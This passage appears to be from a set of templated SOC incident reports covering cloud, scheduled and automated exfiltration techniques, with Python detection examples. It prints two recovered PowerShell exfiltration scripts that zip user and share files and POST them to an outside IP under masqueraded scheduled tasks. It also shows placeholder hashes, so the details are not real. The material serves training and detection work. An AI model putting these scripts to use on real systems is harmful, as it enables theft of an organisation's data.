11:16:45 – Upload of Q4_Financial_Projections.xlsx
11:20:12 – Upload of Customer_PII_Export.csv
11:23:38 – Upload of Board_Meeting_Minutes.docx
11:26:55 – Upload of Merger_Agreement_Draft.pdf
11:29:15 – Upload of password.kdbx
Detection Logic:
Multiple sensitive files uploaded to personal Google Drive
User kwilson has no business need for Google Drive
Files contain financial data, PII, confidential documents
Destination is personal account (not corporate Google Workspace)
Pattern matches data exfiltration to cloud storage
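The detection logic above (large volume to a cloud-storage host in a short window, destination outside the corporate tenant) expressed as a check over proxy-style log records. This is an added example, not Zscaler's rule and not the page's own code; the record schema (ts, user, dest_host, account_domain, file_name, bytes_out), the corporate domain, the cloud-storage host list and the 25 MB / 15 minute thresholds are assumptions. It goes one step beyond the single case in the alert by rating uploads into the corporate tenant lower than uploads into a personal account.

```python
"""Large-upload-to-cloud-storage detection over constructed proxy log records.

Added example: not Zscaler's rule and not the page's own code. The record
fields are a constructed schema, not the real ZIA log format; the corporate
domain, the cloud-storage host list and the thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

MB = 1024 * 1024
CORPORATE_DOMAINS = {"company.com"}                                    # assumed corporate tenant
CLOUD_STORAGE_HOSTS = {"www.googleapis.com", "content.dropboxapi.com"}  # assumed storage endpoints
THRESHOLD_BYTES = 25 * MB                                              # assumed: flag above 25 MB
WINDOW = timedelta(minutes=15)                                         # assumed sliding window


def detect_large_uploads(records, threshold=THRESHOLD_BYTES, window=WINDOW):
    """Return one finding per (user, cloud host) whose busiest sliding window of
    uploads exceeds `threshold` bytes. Uploads into an account outside the
    corporate tenant are rated 'high', matching the personal-account criterion."""
    by_key = defaultdict(list)
    for r in records:
        if r["dest_host"] in CLOUD_STORAGE_HOSTS and r["bytes_out"] > 0:
            by_key[(r["user"], r["dest_host"])].append(
                (datetime.fromisoformat(r["ts"]), r["bytes_out"], r["account_domain"], r["file_name"]))

    findings = []
    for (user, host), events in by_key.items():
        events.sort()
        best_total, best_span, start = 0, (0, 0), 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:   # keep only events inside the window
                start += 1
            total = sum(e[1] for e in events[start:end + 1])
            if total > best_total:
                best_total, best_span = total, (start, end)
        if best_total <= threshold:
            continue
        window_events = events[best_span[0]:best_span[1] + 1]
        personal = any(e[2] not in CORPORATE_DOMAINS for e in window_events)
        findings.append({
            "user": user,
            "dest_host": host,
            "total_mb": round(best_total / MB, 1),
            "file_count": len(window_events),
            "files": [e[3] for e in window_events],
            "personal_account": personal,
            "severity": "high" if personal else "medium",
        })
    return sorted(findings, key=lambda f: f["user"])


# Constructed records mirroring the upload pattern in the alert, plus benign traffic.
SAMPLE_RECORDS = [
    {"ts": "2024-03-02 11:16:45", "user": "kwilson@company.com", "dest_host": "www.googleapis.com",
     "account_domain": "gmail.com", "file_name": "Q4_Financial_Projections.xlsx", "bytes_out": int(12.3 * MB)},
    {"ts": "2024-03-02 11:20:12", "user": "kwilson@company.com", "dest_host": "www.googleapis.com",
     "account_domain": "gmail.com", "file_name": "Customer_PII_Export.csv", "bytes_out": int(8.7 * MB)},
    {"ts": "2024-03-02 11:23:38", "user": "kwilson@company.com", "dest_host": "www.googleapis.com",
     "account_domain": "gmail.com", "file_name": "Board_Meeting_Minutes.docx", "bytes_out": int(2.4 * MB)},
    {"ts": "2024-03-02 11:26:55", "user": "kwilson@company.com", "dest_host": "www.googleapis.com",
     "account_domain": "gmail.com", "file_name": "Merger_Agreement_Draft.pdf", "bytes_out": int(5.6 * MB)},
    {"ts": "2024-03-02 11:29:15", "user": "kwilson@company.com", "dest_host": "www.googleapis.com",
     "account_domain": "gmail.com", "file_name": "password.kdbx", "bytes_out": int(1.8 * MB)},
    # 40 MB into the corporate tenant: over the threshold, but an approved destination
    {"ts": "2024-03-02 09:05:00", "user": "jdoe@company.com", "dest_host": "www.googleapis.com",
     "account_domain": "company.com", "file_name": "deck.pptx", "bytes_out": 40 * MB},
    # small upload into the corporate tenant: no finding
    {"ts": "2024-03-02 10:00:00", "user": "asmith@company.com", "dest_host": "www.googleapis.com",
     "account_domain": "company.com", "file_name": "notes.txt", "bytes_out": 3 * MB},
    # not a cloud-storage host: ignored by this check
    {"ts": "2024-03-02 10:30:00", "user": "asmith@company.com", "dest_host": "api.example.net",
     "account_domain": "-", "file_name": "-", "bytes_out": 90 * MB},
]

if __name__ == "__main__":
    for finding in detect_large_uploads(SAMPLE_RECORDS):
        print(finding)
```

Run against the constructed records, kwilson's five uploads (30.8 MB in 12.5 minutes into a gmail.com account) come back as a single high-severity finding, jdoe's larger upload into the corporate tenant is rated medium, and the small upload and the non-storage host produce nothing.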
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Zscaler alert | Zscaler Admin Console | Confirmed upload to personal Google Drive |
| 2. User Interview | Contact kwilson | Teams, Phone | User did NOT upload files (account compromised) |
| 3. Google Drive Investigation | Check file access | Google Workspace Admin | Files uploaded to attacker’s personal account |
| 4. Immediate Action | Isolate host | CrowdStrike | FIN-WS-078 quarantined |
| 5. Account Remediation | Disable kwilson account | Azure AD, AD | Account disabled; password reset |
| 6. Legal Action | Contact Google for takedown | Legal Team | DMCA takedown request submitted |
Jira Incident Report
Ticket: SOC-2024-158
Summary: T1567 – 30.8 MB of Sensitive Data Exfiltrated to Personal Google Drive
Status: RESOLVED
Resolution: MALICIOUS – Data Breach Confirmed
Priority: P1 – CRITICAL
Labels: T1567, web-service-exfiltration, google-drive, zscaler, data-breach
Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access.
Alert: “Large Upload to Cloud Storage – Potential Data Exfiltration”.
User: kwilson@company.com (Finance Department).
Destination: Google Drive (personal account).
Data: 30.8 MB uploaded.
Time: 2024-03-02 11:30 EST.
Technique: MITRE ATT&CK T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage.
2. Technical Analysis:
Attack Chain:
10:30 – kwilson account compromised via phishing
10:45 – Attacker logs into FIN-WS-078 via RDP
10:50 – Attacker collects sensitive files
11:00 – Attacker accesses personal Google Drive
11:15-11:30 – Upload of 5 files (30.8 MB)
11:30 – Zscaler detects
Files Exfiltrated:
Q4_Financial_Projections.xlsx (12.3 MB) – confidential financial data
Customer_PII_Export.csv (8.7 MB) – names, addresses, SSNs (PII)
Board_Meeting_Minutes.docx (2.4 MB) – strategic discussions
Merger_Agreement_Draft.pdf (5.6 MB) – legal documents
password.kdbx (1.8 MB) – corporate password vault
Google Drive Account:
Email: attacker@gmail.com (personal account)
IP: 185.143.221[.]89 (Bulgaria)
Status: Files uploaded and accessible
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50-11:00 – Data collection
11:15-11:30 – Upload to Google Drive
11:30 – Zscaler alert
11:32 – SOC investigates
11:33 – Host isolated
11:34 – Account disabled
Indicators of Compromise (IoCs):
Network:
– Destination: Google Drive API
– Attacker IP: 185.143.221[.]89
Files:
– 5 files, 30.8 MB exfiltrated (list attached)
Account:
– kwilson (compromised)
– attacker@gmail.com (receiving account)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078 via CrowdStrike.
Blocked Google Drive uploads for compromised account.
Disabled kwilson account.
Reset password.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (PII exposure).
Submitted DMCA takedown request to Google.
Rotated all corporate passwords (password vault compromised).
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Cloud storage allowed (not restricted).
6. Business Impact:
Operational Impact: Finance host offline; password reset for all users.
Data Exposure: 30.8 MB of financial data, PII, strategic documents, passwords exfiltrated.
Regulatory Impact: GDPR/CCPA breach (customer PII).
Financial Impact: Significant (IP theft, incident response, notification, potential fines).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Takedown request submitted.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted cloud storage to corporate accounts only.
Enhanced DLP for cloud uploads.
8. Conclusion:
An attacker compromised a finance user’s account and exfiltrated 30.8 MB of sensitive data to a personal Google Drive account. Zscaler detected the large uploads, but exfiltration had already occurred. A full data breach response was initiated, and all corporate passwords were rotated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-02 12:30 EST
119. T1029 – Scheduled Transfer (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-SCHEDULED-EXFIL-1029-7842
Alert Time: 2024-03-02 16:30:45 EST
Severity: HIGH (85/100)
Source: Darktrace Enterprise Immune System
Rule: “Regular Scheduled Data Transfer – Potential Exfiltration”
MITRE ATT&CK: T1029 – Scheduled Transfer
Alert Details:
Detection: Regular, scheduled data transfers to external IP every 24 hours
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 185.143.221[.]89:443
Pattern: Daily at 04:00 AM (off-hours)
Data Volume: 15-20 MB each transfer
Transfer History (from Darktrace model):
2024-02-28 04:00:15 – 16.2 MB transferred
2024-02-29 04:00:22 – 18.7 MB transferred
2024-03-01 04:00:18 – 15.9 MB transferred
2024-03-02 04:00:25 – 17.3 MB transferred (today)
Current Detection:
Time: 16:30 EST (alert based on pattern analysis)
Detected after 4 days of scheduled transfers
Scheduled Task Details (from EDR):
Task Name: “WindowsUpdateTask” (masquerading)
Trigger: Daily at 04:00 AM
Action: PowerShell script exfiltrating data
Detection Logic:
Regular transfers at same time daily (scheduled)
Off-hours execution (04:00 AM)
Consistent data volume (15-20 MB)
Destination IP known malicious
Pattern matches scheduled exfiltration
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Darktrace alert | Darktrace Console | Confirmed scheduled exfiltration pattern |
| 2. Process Investigation | Identify scheduled task | CrowdStrike Falcon | “WindowsUpdateTask” running PowerShell script |
| 3. Script Analysis | Extract PowerShell script | CrowdStrike Live Response | Script collects and exfiltrates engineering data |
| 4. Data Analysis | Determine what was stolen | File Audit Logs | ~68 MB total exfiltrated over 4 days |
| 5. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 6. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-159
Summary: T1029 – Scheduled Exfiltration of 68 MB Over 4 Days
Status: RESOLVED
Resolution: MALICIOUS – Data Breach Confirmed
Priority: P1 – CRITICAL
Labels: T1029, scheduled-transfer, exfiltration, darktrace, compromised-account
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Regular Scheduled Data Transfer – Potential Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:443.
Pattern: Daily at 04:00 AM, 15-20 MB each.
Total: 68 MB over 4 days.
Time: 2024-03-02 16:30 EST.
Technique: MITRE ATT&CK T1029 – Scheduled Transfer.
2. Technical Analysis:
Attack Chain:
2024-02-28 – rpatel account compromised
2024-02-28 03:00 – Attacker creates scheduled task
2024-02-28 04:00 – First exfiltration (16.2 MB)
2024-02-29 04:00 – Second exfiltration (18.7 MB)
2024-03-01 04:00 – Third exfiltration (15.9 MB)
2024-03-02 04:00 – Fourth exfiltration (17.3 MB)
2024-03-02 16:30 – Darktrace detects pattern
Scheduled Task Details:
Name: WindowsUpdateTask (masquerading)
Trigger: Daily at 04:00 AM
Action: PowerShell script C:\Windows\Tasks\update.ps1
Run As: SYSTEM
PowerShell Script:
```powershell
# Recovered attacker script (C:\Windows\Tasks\update.ps1); destination IP kept defanged as in the IoC list
$files = @(
    "C:\Users\rpatel\Documents\ProjectX\*.*",
    "C:\Users\rpatel\Desktop\*.docx",
    "C:\engineering_data\*.*"
)
$zip = "C:\Windows\Temp\data.zip"
Compress-Archive -Path $files -DestinationPath $zip            # stage collected files in one archive
$bytes = [System.IO.File]::ReadAllBytes($zip)
$b64 = [System.Convert]::ToBase64String($bytes)                # encode archive for an HTTP body
$body = @{data=$b64} | ConvertTo-Json
Invoke-WebRequest -Uri https://185.143.221[.]89/upload -Method POST -Body $body   # exfiltration over HTTPS
Remove-Item $zip                                               # remove the staging artifact
```
Total Data Exfiltrated (68 MB):
ProjectX source code (28 MB)
Engineering designs (22 MB)
Project documentation (12 MB)
Personal notes (6 MB)
3. Investigation Findings:
Timeline:
02-28 03:00 – Task created
02-28 04:00 – Day 1 exfiltration
02-29 04:00 – Day 2 exfiltration
03-01 04:00 – Day 3 exfiltration
03-02 04:00 – Day 4 exfiltration
03-02 16:30 – Darktrace alert
03-02 16:32 – SOC investigates
03-02 16:33 – Host isolated
03-02 16:34 – Scheduled task disabled
Indicators of Compromise (IoCs):
Scheduled Task:
– “WindowsUpdateTask”
– Action: C:\Windows\Tasks\update.ps1
Files:
– C:\Windows\Tasks\update.ps1 (SHA256: a1b2c3d4…)
Network:
– Destination: 185.143.221[.]89:443
– Pattern: 15-20 MB daily at 04:00 AM
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Disabled scheduled task.
Deleted PowerShell script.
Blocked destination IP at firewall.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (68 MB over 4 days).
Notified affected data owners.
Initiated breach response.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to scheduled exfiltration.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Scheduled task not monitored.
Off-hours transfers not detected for 4 days.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 68 MB of engineering IP exfiltrated over 4 days.
Financial Impact: Significant (IP theft, incident response).
7. Remediation & Prevention:
Completed Actions:
Scheduled exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced monitoring for scheduled tasks.
Created alert for off-hours data transfers.
8. Conclusion:
An attacker compromised an engineering account and created a scheduled task that exfiltrated 68 MB of intellectual property over 4 days, operating daily at 04:00 AM to evade detection. Darktrace detected the pattern after 4 days, enabling containment.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-02 17:30 EST
120. T1537 – Transfer Data to Cloud Account (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-CLOUD-EXFIL-1537-7842
Alert Time: 2024-03-02 10:30:22 EST
Severity: CRITICAL (98/100)
Source: AWS GuardDuty
Rule: “Data Exfiltration to External AWS Account Detected”
MITRE ATT&CK: T1537 – Transfer Data to Cloud Account
Alert Details:
Detection: Large data transfer from corporate S3 bucket to external AWS account
Source: corporate-data-bucket (S3)
Source Account: 123456789012 (Corporate AWS Account)
Destination: 987654321098 (External AWS Account)
Destination Bucket: attacker-bucket
Time: 10:15-10:30 EST
Data Transfer Details:
10:15:22 – Copy of customer-data-2024.csv (234 MB)
10:18:45 – Copy of financial-reports-q1.zip (156 MB)
10:22:12 – Copy of source-code-backup.tar.gz (345 MB)
10:25:38 – Copy of hr-database.sql (89 MB)
10:28:55 – Copy of passwords.kdbx (2 MB)
Total: 826 MB transferred
Access Details:
Source Bucket: corporate-data-bucket (us-east-1)
Destination Bucket: attacker-bucket (us-west-2)
IAM User: svc_backup (compromised service account)
Source IP: 185.143.221[.]89 (Bulgaria)
API Calls: 47 S3 COPY operations
Detection Logic:
Large data transfer to external AWS account (anomalous)
Service account svc_backup has no business need for external transfers
Destination account not in approved list
Files contain sensitive data (customer, financial, source code, passwords)
Pattern matches cloud-to-cloud exfiltration
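The "destination account not in approved list" and "request from an unexpected IP" criteria above, applied to CloudTrail-style S3 records. This is an added example, not GuardDuty's finding logic and not the page's own code. The records imitate the shape of CloudTrail S3 data events (eventName, userIdentity, sourceIPAddress, requestParameters) but are constructed; the bucket-to-owner inventory, the approved-account list and the corporate egress range (RFC 5737 documentation space) are assumptions, as is the premise that these copy events are visible in the corporate account's trail.

```python
"""Cross-account S3 copy detection over constructed CloudTrail-style records.

Added example: not GuardDuty's logic and not the page's own code. Record
layout imitates CloudTrail S3 data events but every record is constructed;
the bucket inventory, approved accounts and corporate IP range are assumed.
"""
import ipaddress
from collections import Counter

CORPORATE_ACCOUNT = "123456789012"              # corporate account ID from the alert
APPROVED_ACCOUNTS = {CORPORATE_ACCOUNT}         # assumed: no partner accounts approved
BUCKET_OWNER = {                                # assumed inventory: bucket -> owning account
    "corporate-data-bucket": CORPORATE_ACCOUNT,
    "corporate-backups": CORPORATE_ACCOUNT,
}
CORPORATE_NETS = [ipaddress.ip_network("203.0.113.0/24")]   # assumed corporate egress range


def refang(ip):
    """The page defangs IPs as 1.2.3[.]4; real logs carry them plain."""
    return ip.replace("[.]", ".")


def analyze_copy_events(events):
    """Flag CopyObject calls whose destination bucket belongs to an unapproved
    account, or which originate outside the corporate network. Each finding
    lists every reason that fired so an analyst can see both signals at once."""
    findings = []
    for e in events:
        if e.get("eventName") != "CopyObject":
            continue
        params = e["requestParameters"]
        dst_bucket = params["bucketName"]
        src_bucket = params["x-amz-copy-source"].split("/", 1)[0]
        dst_owner = BUCKET_OWNER.get(dst_bucket, "unknown")
        ip = ipaddress.ip_address(refang(e["sourceIPAddress"]))
        reasons = []
        if dst_owner not in APPROVED_ACCOUNTS:
            reasons.append(f"destination bucket {dst_bucket} owned by unapproved account {dst_owner}")
        if not any(ip in net for net in CORPORATE_NETS):
            reasons.append(f"request from non-corporate IP {ip}")
        if reasons:
            findings.append({
                "time": e["eventTime"],
                "user": e["userIdentity"]["userName"],
                "src_bucket": src_bucket,
                "dst_bucket": dst_bucket,
                "key": params["key"],
                "reasons": reasons,
            })
    return findings


def summarize(findings):
    """Count suspicious copies per (user, destination bucket)."""
    return Counter((f["user"], f["dst_bucket"]) for f in findings)


# Constructed events: two of the attacker's copies (10:15 EST = 15:15 UTC), one routine
# backup copy from the corporate network, and an unrelated read that the check ignores.
SAMPLE_EVENTS = [
    {"eventTime": "2024-03-02T15:15:22Z", "eventName": "CopyObject", "awsRegion": "us-west-2",
     "userIdentity": {"type": "IAMUser", "userName": "svc_backup"},
     "sourceIPAddress": "185.143.221[.]89",
     "requestParameters": {"bucketName": "attacker-bucket", "key": "customer-data-2024.csv",
                           "x-amz-copy-source": "corporate-data-bucket/customer-data-2024.csv"}},
    {"eventTime": "2024-03-02T15:28:55Z", "eventName": "CopyObject", "awsRegion": "us-west-2",
     "userIdentity": {"type": "IAMUser", "userName": "svc_backup"},
     "sourceIPAddress": "185.143.221[.]89",
     "requestParameters": {"bucketName": "attacker-bucket", "key": "passwords.kdbx",
                           "x-amz-copy-source": "corporate-data-bucket/passwords.kdbx"}},
    {"eventTime": "2024-03-02T06:00:01Z", "eventName": "CopyObject", "awsRegion": "us-east-1",
     "userIdentity": {"type": "IAMUser", "userName": "svc_backup"},
     "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"bucketName": "corporate-backups", "key": "daily/financial-reports-q1.zip",
                           "x-amz-copy-source": "corporate-data-bucket/financial-reports-q1.zip"}},
    {"eventTime": "2024-03-02T08:12:40Z", "eventName": "GetObject", "awsRegion": "us-east-1",
     "userIdentity": {"type": "IAMUser", "userName": "analyst"},
     "sourceIPAddress": "203.0.113.22",
     "requestParameters": {"bucketName": "corporate-data-bucket", "key": "readme.txt"}},
]

if __name__ == "__main__":
    found = analyze_copy_events(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print(summarize(found))
```

The routine backup copy into corporate-backups from a corporate address produces no finding, while both copies into attacker-bucket fire on two reasons each; the per-user summary is what you would feed into a rule that pairs a credential rotation with a bucket-policy review.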
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify GuardDuty alert | AWS GuardDuty Console | Confirmed data exfiltration to external AWS account |
| 2. Account Investigation | Identify compromised credentials | AWS CloudTrail | svc_backup access keys used from Bulgaria IP |
| 3. Immediate Action | Rotate access keys | AWS IAM | svc_backup keys rotated |
| 4. Bucket Permissions | Revoke external account access | S3 Bucket Policy | Removed permissions for external account |
| 5. Data Protection | Determine what was stolen | S3 Access Logs | 826 MB of data exfiltrated |
| 6. Incident Response | Activate breach response | Legal, Management | Data breach declared |
Jira Incident Report
Ticket: SOC-2024-160
Summary: T1537 – 826 MB of Data Exfiltrated to External AWS Account
Status: RESOLVED
Resolution: MALICIOUS – Data Breach Confirmed
Priority: P1 – CRITICAL
Labels: T1537, cloud-exfiltration, aws, guardduty, data-breach, compromised-credentials
Components: Cloud-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty.
Alert: “Data Exfiltration to External AWS Account Detected”.
Source: corporate-data-bucket (S3, Account 123456789012).
Destination: attacker-bucket (External Account 987654321098).
Data: 826 MB exfiltrated.
Time: 2024-03-02 10:30 EST.
Technique: MITRE ATT&CK T1537 – Transfer Data to Cloud Account.
2. Technical Analysis:
Attack Chain:
09:30 – svc_backup service account credentials compromised (GitHub leak)
09:45 – Attacker uses credentials to access AWS Console from Bulgaria IP
10:00 – Attacker enumerates S3 buckets
10:05 – Attacker identifies corporate-data-bucket
10:15-10:30 – Attacker copies 47 files (826 MB) to external account
10:30 – GuardDuty detects
Exfiltrated Data (826 MB):
customer-data-2024.csv (234 MB) – 1.2M customer records (PII)
financial-reports-q1.zip (156 MB) – quarterly financials
source-code-backup.tar.gz (345 MB) – proprietary source code
hr-database.sql (89 MB) – employee records, salaries
passwords.kdbx (2 MB) – corporate password vault
Compromised Credentials:
IAM User: svc_backup
Permissions: Read access to multiple S3 buckets
Leak Source: Public GitHub repository (committed by mistake)
Status: Keys rotated, user deleted
External Account:
Account ID: 987654321098
Region: us-west-2
Owner: Unknown (likely attacker)
Bucket: attacker-bucket (now contains stolen data)
3. Investigation Findings:
Timeline:
09:30 – Credentials compromised
09:45 – Attacker accesses AWS
10:00 – Bucket enumeration
10:15-10:30 – Data exfiltration
10:30 – GuardDuty alert
10:32 – SOC investigates
10:33 – Keys rotated
10:34 – External account access revoked
Indicators of Compromise (IoCs):
AWS:
– Source Account: 123456789012
– Destination Account: 987654321098
– Destination Bucket: attacker-bucket
Network:
– Attacker IP: 185.143.221[.]89
Credentials:
– svc_backup access keys (rotated)
Data:
– 47 files, 826 MB exfiltrated (list attached)
4. Containment Actions:
Immediate Actions:
Rotated svc_backup access keys.
Removed external account permissions from S3 bucket policy.
Blocked attacker IP at AWS WAF.
Disabled compromised IAM user.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (1.2M customer records).
Rotated all corporate passwords (password vault compromised).
Engaged AWS support to assist with data recovery/takedown.
Cloud Remediation:
Audited all S3 bucket policies.
Implemented S3 Block Public Access.
Enabled S3 server access logging.
5. Root Cause Analysis:
Primary Cause: Service account credentials leaked in public GitHub repository.
Contributing Factors:
No secret scanning in place.
Service account had excessive permissions (read access to sensitive buckets).
No MFA for service accounts (not possible).
No alerting for cross-account data transfers.
6. Business Impact:
Operational Impact: Cloud services affected; password reset for all users.
Data Exposure: 826 MB of customer PII, financial data, source code, passwords exfiltrated.
Regulatory Impact: GDPR/CCPA breach (1.2M customer records).
Financial Impact: Catastrophic (incident response, notifications, fines, lawsuits).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Keys rotated.
External access revoked.
Breach response initiated.
Technical Controls Enhanced:
Implemented secret scanning (GitHub Advanced Security).
Enforced least privilege for service accounts.
Added S3 bucket policies to block cross-account transfers.
Enabled GuardDuty with automated response.
Deployed AWS Config rules for cross-account access.
8. Conclusion:
An attacker obtained compromised service account credentials from a public GitHub repository and used them to exfiltrate 826 MB of sensitive data to an external AWS account. GuardDuty detected the cross-account data transfer, but exfiltration had already occurred. A full data breach response was initiated, affecting 1.2 million customers.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated; customer notifications underway.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-02 11:30 EST
End of Batch 24
Batch 25: Impact Incident Reports
121. T1020 – Automated Exfiltration (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-AUTO-EXFIL-1020-7842
Alert Time: 2024-03-03 09:30:15 EST
Severity: CRITICAL (95/100)
Source: Varonis Data Security Platform
Rule: “Automated Data Collection Script Detected – Potential Mass Exfiltration”
MITRE ATT&CK: T1020 – Automated Exfiltration
Alert Details:
Detection: PowerShell script automatically collecting and exfiltrating data at regular intervals
User: kwilson@company.com (Karen Wilson, Finance Manager)
Host: FIN-WS-112
Time: 09:15-09:30 EST
Script Details:
Path: C:\Users\kwilson\AppData\Local\Temp\backup.ps1
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Scheduled Task: “FinanceBackup” (created 09:00)
Trigger: Every 30 minutes
Script Content:
```powershell
# Recovered attacker script (backup.ps1); destination IP kept defanged as in the IoC list
while($true) {
    $targets = @(
        "\\filesrv\finance\reports\*.xlsx",
        "\\filesrv\finance\budgets\*.xlsx",
        "\\filesrv\executive\board\*.docx",
        "C:\Users\kwilson\Documents\*.xlsx",
        "C:\Users\kwilson\Desktop\*.docx"
    )
    $zipFile = "C:\temp\data_$(Get-Date -Format 'yyyyMMddHHmm').zip"
    $tempDir = "C:\temp\collect"
    New-Item -ItemType Directory -Path $tempDir -Force
    foreach ($target in $targets) {
        # copy from network shares and local folders into a staging directory
        Copy-Item -Path $target -Destination $tempDir -Recurse -ErrorAction SilentlyContinue
    }
    Compress-Archive -Path $tempDir\* -DestinationPath $zipFile -Force
    Remove-Item -Path $tempDir -Recurse -Force
    # Exfiltrate: base64-encode the archive and POST it as JSON
    $bytes = [System.IO.File]::ReadAllBytes($zipFile)
    $b64 = [System.Convert]::ToBase64String($bytes)
    $body = @{data=$b64} | ConvertTo-Json
    Invoke-WebRequest -Uri http://185.143.221[.]89/upload -Method POST -Body $body
    Remove-Item $zipFile
    Start-Sleep -Seconds 1800   # repeat every 30 minutes
}
```
Automated Exfiltration Log:
09:00 – Script started (scheduled task)
09:01 – First collection: 234 files (45 MB)
09:02 – Exfiltration of 45 MB to 185.143.221[.]89
09:30 – Second collection in progress (detected)
Detection Logic:
Script runs automatically every 30 minutes
Collects data from multiple sensitive locations
Exfiltrates immediately after collection
Pattern matches automated, continuous exfiltration
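Both this report and report 119 (T1029, daily transfers at 04:00) hinge on the same signal: outbound transfers to one destination whose timing and volume are far more regular than human activity. The detector below scores that regularity with the coefficient of variation of the inter-event gaps and of the per-event volumes, and flags a source/destination pair when both are near constant. It is an added example serving both reports, not Darktrace's or Varonis's model and not the page's own code; the flow schema (ts, src, dst, bytes_out), the minimum size, the variation limits and the off-hours window are assumptions, and the flow records are constructed from the transfer histories in the two alerts.

```python
"""Periodic-outbound-transfer detection over constructed flow records.

Added example for reports 119 (T1029) and 121 (T1020); not Darktrace's or
Varonis's model and not the page's own code. Flow schema, thresholds and the
off-hours definition are assumptions; the records are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

MB = 1024 * 1024


def coefficient_of_variation(values):
    """Standard deviation relative to the mean; 0 means perfectly regular."""
    m = mean(values)
    return pstdev(values) / m if m else 0.0


def detect_periodic_transfers(flows, min_events=3, max_interval_cv=0.05,
                              max_volume_cv=0.30, min_bytes=1 * MB, off_hours=(0, 6)):
    """Group outbound flows by (src, dst) and flag groups whose inter-event gaps
    and per-event volumes are both nearly constant. `off_hours` is the
    half-open hour range [start, end) treated as outside business hours."""
    groups = defaultdict(list)
    for f in flows:
        if f["bytes_out"] >= min_bytes:
            groups[(f["src"], f["dst"])].append((datetime.fromisoformat(f["ts"]), f["bytes_out"]))

    findings = []
    for (src, dst), events in groups.items():
        if len(events) < min_events:
            continue
        events.sort()
        times = [t for t, _ in events]
        volumes = [v for _, v in events]
        intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if coefficient_of_variation(intervals) > max_interval_cv:
            continue                        # gaps vary too much: not a schedule
        if coefficient_of_variation(volumes) > max_volume_cv:
            continue                        # sizes vary too much: not a fixed collection job
        findings.append({
            "src": src,
            "dst": dst,
            "events": len(events),
            "period_minutes": round(mean(intervals) / 60),
            "avg_mb": round(mean(volumes) / MB, 1),
            "off_hours": all(off_hours[0] <= t.hour < off_hours[1] for t in times),
        })
    return findings


# Constructed flows: the daily 04:00 series from report 119, a 30-minute series in the
# shape of report 121's scheduled task, and irregular browsing that must not fire.
SAMPLE_FLOWS = [
    {"ts": "2024-02-28 04:00:15", "src": "192.168.45.78", "dst": "185.143.221[.]89:443", "bytes_out": int(16.2 * MB)},
    {"ts": "2024-02-29 04:00:22", "src": "192.168.45.78", "dst": "185.143.221[.]89:443", "bytes_out": int(18.7 * MB)},
    {"ts": "2024-03-01 04:00:18", "src": "192.168.45.78", "dst": "185.143.221[.]89:443", "bytes_out": int(15.9 * MB)},
    {"ts": "2024-03-02 04:00:25", "src": "192.168.45.78", "dst": "185.143.221[.]89:443", "bytes_out": int(17.3 * MB)},
    {"ts": "2024-03-03 09:01:10", "src": "192.168.45.112", "dst": "185.143.221[.]89:80", "bytes_out": 45 * MB},
    {"ts": "2024-03-03 09:31:05", "src": "192.168.45.112", "dst": "185.143.221[.]89:80", "bytes_out": 42 * MB},
    {"ts": "2024-03-03 10:01:12", "src": "192.168.45.112", "dst": "185.143.221[.]89:80", "bytes_out": 47 * MB},
    {"ts": "2024-03-03 10:31:08", "src": "192.168.45.112", "dst": "185.143.221[.]89:80", "bytes_out": 44 * MB},
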